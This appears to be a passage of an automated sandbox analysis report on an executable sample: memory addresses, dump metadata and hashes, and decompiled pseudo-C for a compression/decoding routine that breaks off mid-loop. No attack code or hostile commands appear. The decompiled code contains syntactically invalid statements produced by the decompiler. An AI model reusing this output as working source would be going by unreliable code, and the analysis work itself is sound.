                                                                                                    0x00406459
                                                                                                    0x00406459
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004064ee
                                                                                                    0x004064f2
                                                                                                    0x004064f9
                                                                                                    0x004064fc
                                                                                                    0x004064ff
                                                                                                    0x00406509
                                                                                                    0x00000000
                                                                                                    0x00406509
                                                                                                    0x004064f4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406515
                                                                                                    0x00406519
                                                                                                    0x00406520
                                                                                                    0x00406523
                                                                                                    0x00406526
                                                                                                    0x0040651b
                                                                                                    0x0040651b
                                                                                                    0x0040651b
                                                                                                    0x00406529
                                                                                                    0x0040652c
                                                                                                    0x0040652f
                                                                                                    0x0040652f
                                                                                                    0x00406532
                                                                                                    0x00406535
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004065d5
                                                                                                    0x004065d5
                                                                                                    0x004065d9
                                                                                                    0x00406977
                                                                                                    0x00000000
                                                                                                    0x00406977
                                                                                                    0x004065df
                                                                                                    0x004065e2
                                                                                                    0x004065e5
                                                                                                    0x004065e9
                                                                                                    0x004065ec
                                                                                                    0x004065f2
                                                                                                    0x004065f4
                                                                                                    0x004065f4
                                                                                                    0x004065f4
                                                                                                    0x004065f7
                                                                                                    0x004065fa
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004061ca
                                                                                                    0x004061ca
                                                                                                    0x004061ce
                                                                                                    0x0040693b
                                                                                                    0x00000000
                                                                                                    0x0040693b
                                                                                                    0x004061d4
                                                                                                    0x004061d7
                                                                                                    0x004061da
                                                                                                    0x004061de
                                                                                                    0x004061e1
                                                                                                    0x004061e7
                                                                                                    0x004061e9
                                                                                                    0x004061e9
                                                                                                    0x004061e9
                                                                                                    0x004061ec
                                                                                                    0x004061ef
                                                                                                    0x004061ef
                                                                                                    0x004061f2
                                                                                                    0x004061f5
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004061fb
                                                                                                    0x00406201
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406207
                                                                                                    0x00406207
                                                                                                    0x0040620b
                                                                                                    0x0040620e
                                                                                                    0x00406211
                                                                                                    0x00406214
                                                                                                    0x00406217
                                                                                                    0x00406218
                                                                                                    0x0040621b
                                                                                                    0x0040621d
                                                                                                    0x00406223
                                                                                                    0x00406226
                                                                                                    0x00406229
                                                                                                    0x0040622c
                                                                                                    0x0040622f
                                                                                                    0x00406232
                                                                                                    0x00406235
                                                                                                    0x00406251
                                                                                                    0x00406254
                                                                                                    0x00406257
                                                                                                    0x0040625a
                                                                                                    0x00406261
                                                                                                    0x00406265
                                                                                                    0x00406267
                                                                                                    0x0040626b
                                                                                                    0x00406237
                                                                                                    0x00406237
                                                                                                    0x0040623b
                                                                                                    0x00406243
                                                                                                    0x00406248
                                                                                                    0x0040624a
                                                                                                    0x0040624c
                                                                                                    0x0040624c
                                                                                                    0x0040626e
                                                                                                    0x00406275
                                                                                                    0x00406278
                                                                                                    0x00000000
                                                                                                    0x0040627e
                                                                                                    0x00000000
                                                                                                    0x0040627e
                                                                                                    0x00000000
                                                                                                    0x00406283
                                                                                                    0x00406283
                                                                                                    0x00406287
                                                                                                    0x00406947
                                                                                                    0x00000000
                                                                                                    0x00406947
                                                                                                    0x0040628d
                                                                                                    0x00406290
                                                                                                    0x00406293
                                                                                                    0x00406297
                                                                                                    0x0040629a
                                                                                                    0x004062a0
                                                                                                    0x004062a2
                                                                                                    0x004062a2
                                                                                                    0x004062a2
                                                                                                    0x004062a5
                                                                                                    0x004062a8
                                                                                                    0x004062a8
                                                                                                    0x004062a8
                                                                                                    0x004062ae
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004062b0
                                                                                                    0x004062b3
                                                                                                    0x004062b6
                                                                                                    0x004062b9
                                                                                                    0x004062bc
                                                                                                    0x004062bf
                                                                                                    0x004062c2
                                                                                                    0x004062c5
                                                                                                    0x004062c8
                                                                                                    0x004062cb
                                                                                                    0x004062ce
                                                                                                    0x004062e6
                                                                                                    0x004062e9
                                                                                                    0x004062ec
                                                                                                    0x004062ef
                                                                                                    0x004062ef
                                                                                                    0x004062f2
                                                                                                    0x004062f6
                                                                                                    0x004062f8
                                                                                                    0x004062d0
                                                                                                    0x004062d0
                                                                                                    0x004062d8
                                                                                                    0x004062dd
                                                                                                    0x004062df
                                                                                                    0x004062e1
                                                                                                    0x004062e1
                                                                                                    0x004062fb
                                                                                                    0x00406302
                                                                                                    0x00406305
                                                                                                    0x00000000
                                                                                                    0x00406307
                                                                                                    0x00000000
                                                                                                    0x00406307
                                                                                                    0x00406305
                                                                                                    0x0040630c
                                                                                                    0x0040630c
                                                                                                    0x0040630c
                                                                                                    0x0040630c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406347
                                                                                                    0x00406347
                                                                                                    0x0040634b
                                                                                                    0x00406953
                                                                                                    0x00000000
                                                                                                    0x00406953
                                                                                                    0x00406351
                                                                                                    0x00406354
                                                                                                    0x00406357
                                                                                                    0x0040635b
                                                                                                    0x0040635e
                                                                                                    0x00406364
                                                                                                    0x00406366
                                                                                                    0x00406366
                                                                                                    0x00406366
                                                                                                    0x00406369
                                                                                                    0x0040636c
                                                                                                    0x0040636c
                                                                                                    0x00406372
                                                                                                    0x00406310
                                                                                                    0x00406310
                                                                                                    0x00406313
                                                                                                    0x00000000
                                                                                                    0x00406313
                                                                                                    0x00406374
                                                                                                    0x00406374
                                                                                                    0x00406377
                                                                                                    0x0040637a
                                                                                                    0x0040637d
                                                                                                    0x00406380
                                                                                                    0x00406383
                                                                                                    0x00406386
                                                                                                    0x00406389
                                                                                                    0x0040638c
                                                                                                    0x0040638f
                                                                                                    0x00406392
                                                                                                    0x004063aa
                                                                                                    0x004063ad
                                                                                                    0x004063b0
                                                                                                    0x004063b3
                                                                                                    0x004063b3
                                                                                                    0x004063b6
                                                                                                    0x004063ba
                                                                                                    0x004063bc
                                                                                                    0x00406394
                                                                                                    0x00406394
                                                                                                    0x0040639c
                                                                                                    0x004063a1
                                                                                                    0x004063a3
                                                                                                    0x004063a5
                                                                                                    0x004063a5
                                                                                                    0x004063bf
                                                                                                    0x004063c6
                                                                                                    0x004063c9
                                                                                                    0x00000000
                                                                                                    0x004063cb
                                                                                                    0x00000000
                                                                                                    0x004063cb
                                                                                                    0x00000000
                                                                                                    0x00406658
                                                                                                    0x00406658
                                                                                                    0x0040665c
                                                                                                    0x00406983
                                                                                                    0x00000000
                                                                                                    0x00406983
                                                                                                    0x00406662
                                                                                                    0x00406665
                                                                                                    0x00406668
                                                                                                    0x0040666c
                                                                                                    0x0040666f
                                                                                                    0x00406675
                                                                                                    0x00406677
                                                                                                    0x00406677
                                                                                                    0x00406677
                                                                                                    0x0040667a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406767
                                                                                                    0x0040676b
                                                                                                    0x0040678d
                                                                                                    0x00406790
                                                                                                    0x0040679a
                                                                                                    0x00000000
                                                                                                    0x0040679a
                                                                                                    0x0040676d
                                                                                                    0x00406770
                                                                                                    0x00406774
                                                                                                    0x00406777
                                                                                                    0x00406777
                                                                                                    0x0040677a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406824
                                                                                                    0x00406828
                                                                                                    0x00406846
                                                                                                    0x00406846
                                                                                                    0x00406846
                                                                                                    0x0040684d
                                                                                                    0x00406854
                                                                                                    0x0040685b
                                                                                                    0x0040685b
                                                                                                    0x00000000
                                                                                                    0x0040685b
                                                                                                    0x0040682a
                                                                                                    0x0040682d
                                                                                                    0x00406830
                                                                                                    0x00406833
                                                                                                    0x0040683a
                                                                                                    0x0040677e
                                                                                                    0x0040677e
                                                                                                    0x00406781
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406915
                                                                                                    0x00406918
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040654f
                                                                                                    0x00406551
                                                                                                    0x00406558
                                                                                                    0x00406559
                                                                                                    0x0040655b
                                                                                                    0x0040655e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406566
                                                                                                    0x00406569
                                                                                                    0x0040656c
                                                                                                    0x0040656e
                                                                                                    0x00406570
                                                                                                    0x00406570
                                                                                                    0x00406571
                                                                                                    0x00406574
                                                                                                    0x0040657b
                                                                                                    0x0040657e
                                                                                                    0x0040658c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406862
                                                                                                    0x00406862
                                                                                                    0x00406865
                                                                                                    0x0040686c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406871
                                                                                                    0x00406871
                                                                                                    0x00406875
                                                                                                    0x004069ad
                                                                                                    0x00000000
                                                                                                    0x004069ad
                                                                                                    0x0040687b
                                                                                                    0x0040687e
                                                                                                    0x00406881
                                                                                                    0x00406885
                                                                                                    0x00406888
                                                                                                    0x0040688e
                                                                                                    0x00406890
                                                                                                    0x00406890
                                                                                                    0x00406890
                                                                                                    0x00406893
                                                                                                    0x00406896
                                                                                                    0x00406896
                                                                                                    0x00406896
                                                                                                    0x00406896
                                                                                                    0x00406899
                                                                                                    0x00406899
                                                                                                    0x0040689d
                                                                                                    0x004068fd
                                                                                                    0x00406900
                                                                                                    0x00406905
                                                                                                    0x00406906
                                                                                                    0x00406908
                                                                                                    0x0040690a
                                                                                                    0x0040690d
                                                                                                    0x00000000
                                                                                                    0x0040690d
                                                                                                    0x0040689f
                                                                                                    0x004068a5
                                                                                                    0x004068a8
                                                                                                    0x004068ab
                                                                                                    0x004068ae
                                                                                                    0x004068b1
                                                                                                    0x004068b4
                                                                                                    0x004068b7
                                                                                                    0x004068ba
                                                                                                    0x004068bd
                                                                                                    0x004068c0
                                                                                                    0x004068d9
                                                                                                    0x004068dc
                                                                                                    0x004068df
                                                                                                    0x004068e2
                                                                                                    0x004068e6
                                                                                                    0x004068e8
                                                                                                    0x004068e8
                                                                                                    0x004068e9
                                                                                                    0x004068ec
                                                                                                    0x004068c2
                                                                                                    0x004068c2
                                                                                                    0x004068ca
                                                                                                    0x004068cf
                                                                                                    0x004068d1
                                                                                                    0x004068d4
                                                                                                    0x004068d4
                                                                                                    0x004068ef
                                                                                                    0x004068f6
                                                                                                    0x00000000
                                                                                                    0x004068f8
                                                                                                    0x00000000
                                                                                                    0x004068f8
                                                                                                    0x00000000
                                                                                                    0x00406594
                                                                                                    0x00406597
                                                                                                    0x004065cd
                                                                                                    0x004066fd
                                                                                                    0x004066fd
                                                                                                    0x004066fd
                                                                                                    0x004066fd
                                                                                                    0x00406700
                                                                                                    0x00406700
                                                                                                    0x00406703
                                                                                                    0x00406705
                                                                                                    0x0040698f
                                                                                                    0x00000000
                                                                                                    0x0040698f
                                                                                                    0x0040670b
                                                                                                    0x0040670e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406714
                                                                                                    0x00406718
                                                                                                    0x0040671b
                                                                                                    0x0040671b
                                                                                                    0x0040671b
                                                                                                    0x00000000
                                                                                                    0x0040671b
                                                                                                    0x00406599
                                                                                                    0x0040659b
                                                                                                    0x0040659d
                                                                                                    0x0040659f
                                                                                                    0x004065a2
                                                                                                    0x004065a3
                                                                                                    0x004065a5
                                                                                                    0x004065a7
                                                                                                    0x004065aa
                                                                                                    0x004065ad
                                                                                                    0x004065c3
                                                                                                    0x004065c8
                                                                                                    0x00406600
                                                                                                    0x00406600
                                                                                                    0x00406604
                                                                                                    0x00406630
                                                                                                    0x00406632
                                                                                                    0x00406639
                                                                                                    0x0040663c
                                                                                                    0x0040663f
                                                                                                    0x0040663f
                                                                                                    0x00406644
                                                                                                    0x00406644
                                                                                                    0x00406646
                                                                                                    0x00406649
                                                                                                    0x00406650
                                                                                                    0x00406653
                                                                                                    0x00406680
                                                                                                    0x00406680
                                                                                                    0x00406683
                                                                                                    0x00406686
                                                                                                    0x004066fa
                                                                                                    0x004066fa
                                                                                                    0x004066fa
                                                                                                    0x00000000
                                                                                                    0x004066fa
                                                                                                    0x00406688
                                                                                                    0x0040668e
                                                                                                    0x00406691
                                                                                                    0x00406694
                                                                                                    0x00406697
                                                                                                    0x0040669a
                                                                                                    0x0040669d
                                                                                                    0x004066a0
                                                                                                    0x004066a3
                                                                                                    0x004066a6
                                                                                                    0x004066a9
                                                                                                    0x004066c2
                                                                                                    0x004066c4
                                                                                                    0x004066c7
                                                                                                    0x004066c8
                                                                                                    0x004066cb
                                                                                                    0x004066cd
                                                                                                    0x004066d0
                                                                                                    0x004066d2
                                                                                                    0x004066d4
                                                                                                    0x004066d7
                                                                                                    0x004066d9
                                                                                                    0x004066dc
                                                                                                    0x004066e0
                                                                                                    0x004066e2
                                                                                                    0x004066e2
                                                                                                    0x004066e3
                                                                                                    0x004066e6
                                                                                                    0x004066e9
                                                                                                    0x004066ab
                                                                                                    0x004066ab
                                                                                                    0x004066b3
                                                                                                    0x004066b8
                                                                                                    0x004066ba
                                                                                                    0x004066bd
                                                                                                    0x004066bd
                                                                                                    0x004066ec
                                                                                                    0x004066f3
                                                                                                    0x0040667d
                                                                                                    0x0040667d
                                                                                                    0x0040667d
                                                                                                    0x0040667d
                                                                                                    0x00000000
                                                                                                    0x004066f5
                                                                                                    0x00000000
                                                                                                    0x004066f5
                                                                                                    0x004066f3
                                                                                                    0x00406606
                                                                                                    0x00406609
                                                                                                    0x0040660b
                                                                                                    0x0040660e
                                                                                                    0x00406611
                                                                                                    0x00406614
                                                                                                    0x00406616
                                                                                                    0x00406619
                                                                                                    0x0040661c
                                                                                                    0x0040661c
                                                                                                    0x0040661f
                                                                                                    0x0040661f
                                                                                                    0x00406622
                                                                                                    0x00406629
                                                                                                    0x004065fd
                                                                                                    0x004065fd
                                                                                                    0x004065fd
                                                                                                    0x004065fd
                                                                                                    0x00000000
                                                                                                    0x0040662b
                                                                                                    0x00000000
                                                                                                    0x0040662b
                                                                                                    0x00406629
                                                                                                    0x004065af
                                                                                                    0x004065b2
                                                                                                    0x004065b4
                                                                                                    0x004065b7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406316
                                                                                                    0x00406316
                                                                                                    0x0040631a
                                                                                                    0x0040695f
                                                                                                    0x00000000
                                                                                                    0x0040695f
                                                                                                    0x00406320
                                                                                                    0x00406323
                                                                                                    0x00406326
                                                                                                    0x00406329
                                                                                                    0x0040632c
                                                                                                    0x0040632f
                                                                                                    0x00406332
                                                                                                    0x00406334
                                                                                                    0x00406337
                                                                                                    0x0040633a
                                                                                                    0x0040633d
                                                                                                    0x0040633f
                                                                                                    0x0040633f
                                                                                                    0x0040633f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040671e
                                                                                                    0x0040671e
                                                                                                    0x0040671e
                                                                                                    0x00406722
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406728
                                                                                                    0x0040672b
                                                                                                    0x0040672e
                                                                                                    0x00406731
                                                                                                    0x00406733
                                                                                                    0x00406733
                                                                                                    0x00406733
                                                                                                    0x00406736
                                                                                                    0x00406739
                                                                                                    0x0040673c
                                                                                                    0x0040673f
                                                                                                    0x00406742
                                                                                                    0x00406745
                                                                                                    0x00406746
                                                                                                    0x00406748
                                                                                                    0x00406748
                                                                                                    0x00406748
                                                                                                    0x0040674b
                                                                                                    0x0040674e
                                                                                                    0x00406751
                                                                                                    0x00406754
                                                                                                    0x00406757
                                                                                                    0x0040675b
                                                                                                    0x0040675d
                                                                                                    0x00406760
                                                                                                    0x00000000
                                                                                                    0x00406762
                                                                                                    0x00000000
                                                                                                    0x00406762
                                                                                                    0x00406760
                                                                                                    0x00406995
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405fc4

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3ca4e82cbd918d9bc6f131d9bc7fd5d61b9600368ad5a57dd77e762cc9babb20
                                                                                                    • Instruction ID: e06b97397237a54a8f7c6fae7a0c48c933f493286525731b7b3672fa0d973436
                                                                                                    • Opcode Fuzzy Hash: 3ca4e82cbd918d9bc6f131d9bc7fd5d61b9600368ad5a57dd77e762cc9babb20
                                                                                                    • Instruction Fuzzy Hash: 678155B1D00229CFDF24CFA8C8447ADBBB1FB44305F25816AD456BB281D7789A96CF54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00405F82, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 98%
                                                                                                    			E00405F82(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004069D4))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600);
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68);
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
